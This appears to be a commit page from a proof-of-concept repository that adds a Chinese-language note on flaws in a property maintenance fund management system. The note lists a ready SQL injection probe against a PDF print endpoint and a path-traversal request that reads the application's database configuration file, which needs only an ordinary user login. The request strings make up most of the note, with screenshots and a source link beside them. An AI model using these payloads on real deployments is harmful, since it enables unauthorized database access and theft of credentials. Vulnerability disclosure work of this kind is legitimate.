admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 物业专项维修资金管理系统漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-12 20:58:56 +08:00 committed by GitHub
parent fe016a9323
commit bf6231ffca
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
物业专项维修资金管理系统漏洞.md Normal file
View File

@ -0,0 +1,23 @@
## 物业专项维修资金管理系统漏洞
利用条件:所有漏洞均需要普通用户权限
## sql注入漏洞
```
/property/propertyRightAlteration/printManyPdf?id=1+and+1=1a
```
![81a445dd5c9a5cf1b569dd4216b1bec8](https://github.com/wy876/POC/assets/139549762/9210a9de-0bfe-4772-84bf-4d2873425569)
![3fb59376b871a4fa375e8b3e6c440067](https://github.com/wy876/POC/assets/139549762/8716165d-9b8c-4ba4-95f2-9fe674267595)
## 文件读取漏洞
```
/common/download?fileName=../../wxzj/application-druid.yml
```
![6605ac7e553fc1d894fa7bc3dceb66b3](https://github.com/wy876/POC/assets/139549762/eccbbbf9-7d99-400e-8e96-8e3673b0e45c)
## 漏洞来源
- https://mp.weixin.qq.com/s/wNCafw5pBGTnUEVUoDjbtg